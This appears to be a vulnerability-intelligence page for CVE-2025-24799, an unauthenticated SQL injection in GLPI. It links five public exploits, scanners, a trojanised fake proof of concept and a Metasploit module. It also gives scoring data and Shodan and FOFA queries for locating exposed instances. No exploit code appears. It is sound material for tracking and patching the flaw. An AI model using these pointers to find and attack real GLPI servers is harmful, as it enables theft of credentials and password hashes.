CVE-2025-24799

HIGH EXPLOITED NUCLEI

GLPI 10.0.0-10.0.17 - Unauthenticated SQL Injection via Inventory Endpoint

Title source: llm

Exploitation Summary

CVE-2025-24799 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 5 public exploits from researchers including MatheuZSecurity, MuhammadWaseem29, airbus-cert, including a Metasploit module auxiliary/gather/glpi_inventory_plugin_unauth_sqli. A Nuclei detection template is also available.

AI-analyzed exploit summary This is a functional exploit for CVE-2025-24799, an unauthenticated SQL injection vulnerability in GLPI. It uses time-based blind SQL injection to extract user credentials from the 'glpi_users' table.

Description

GLPI is a free asset and IT management software package. An unauthenticated user can perform a SQL injection through the inventory endpoint. This vulnerability is fixed in 10.0.18.

Exploits (5)

nomisec WORKING POC 33 stars

by MatheuZSecurity · infoleak

https://github.com/MatheuZSecurity/Exploit-CVE-2025-24799

View Code ZIP pw:eip

This is a functional exploit for CVE-2025-24799, an unauthenticated SQL injection vulnerability in GLPI. It uses time-based blind SQL injection to extract user credentials from the 'glpi_users' table.

Classification

Working Poc 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: GLPI (version not specified)

No auth needed

Prerequisites: Target URL with vulnerable endpoint · Network access to the target

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec SCANNER 5 stars

by MuhammadWaseem29 · infoleak

https://github.com/MuhammadWaseem29/CVE-2025-24799

View Code ZIP pw:eip

This repository contains a Python-based SQL injection scanner designed to detect CVE-2025-24799 vulnerabilities using time-based SQLi techniques with multithreading. The tool scans URLs for SQLi vulnerabilities by injecting a payload that induces a time delay, confirming vulnerability if the delay exceeds a threshold.

Classification

Scanner 90%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: Unknown (scanner targets web applications with SQLi vulnerabilities)

No auth needed

Prerequisites: Python 3.x · requests library · colorama library · target URLs

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec SCANNER

by airbus-cert · infoleak

https://github.com/airbus-cert/CVE-2025-24799-scanner

View Code ZIP pw:eip

This repository contains a Python-based scanner for detecting SQL injection vulnerability (CVE-2025-24799) in GLPI software. The scanner uses time-based blind SQL injection to test for vulnerability by measuring response delays.

Classification

Scanner 95%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: GLPI (version not specified)

No auth needed

Prerequisites: Network access to the target GLPI instance · Target endpoint must be reachable at /index.php/ajax/

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec TROJAN

by Rosemary1337 · poc

https://github.com/Rosemary1337/CVE-2025-24799

View Code ZIP pw:eip

The repository claims to be a PoC for CVE-2025-24799 targeting GLPI with SQL injection, but the main.py file contains obfuscated payloads unrelated to the stated vulnerability, indicating deception.

Classification

Trojan 95%

Attack Type

Other

Complexity

Moderate

Reliability

Theoretical

Target: GLPI

No auth needed

devstral-2 · analyzed Feb 16, 2026 Full analysis →

metasploit WORKING POC

by rz, jheysel-r7 · rubypoc

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb

View Code ZIP pw:eip

This Metasploit module exploits an unauthenticated blind boolean SQL injection vulnerability in GLPI's Inventory plugin by sending maliciously crafted XML payloads to dump sensitive data such as usernames and password hashes.

Classification

Working Poc 100%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: GLPI <= 1.0.18 with Inventory plugin enabled

No auth needed

Prerequisites: GLPI Inventory plugin installed and enabled · Inventory feature enabled in administration configuration

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

Nuclei Templates (1)

GLPI < 10.0.17 - Pre-Auth SQL Injection

CRITICALVERIFIEDby ritikchaddha

Shodan: title:"GLPI"

FOFA: title="GLPI"

References (1)

Core 1

Core References

Vendor Advisory x_refsource_confirm

https://github.com/glpi-project/glpi/security/advisories/GHSA-jv89-g7f7-jwfg

Scores

CVSS v3 7.5

EPSS 0.2884

EPSS Percentile 96.7%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CISA SSVC

Vulnrichment

Exploitation none

Automatable yes

Technical Impact partial

Details

VulnCheck KEV 2025-04-17

CWE

CWE-89

Status published

Products (1)

glpi-project/glpi 10.0.0 - 10.0.18

Published Mar 18, 2025

Tracked Since Feb 18, 2026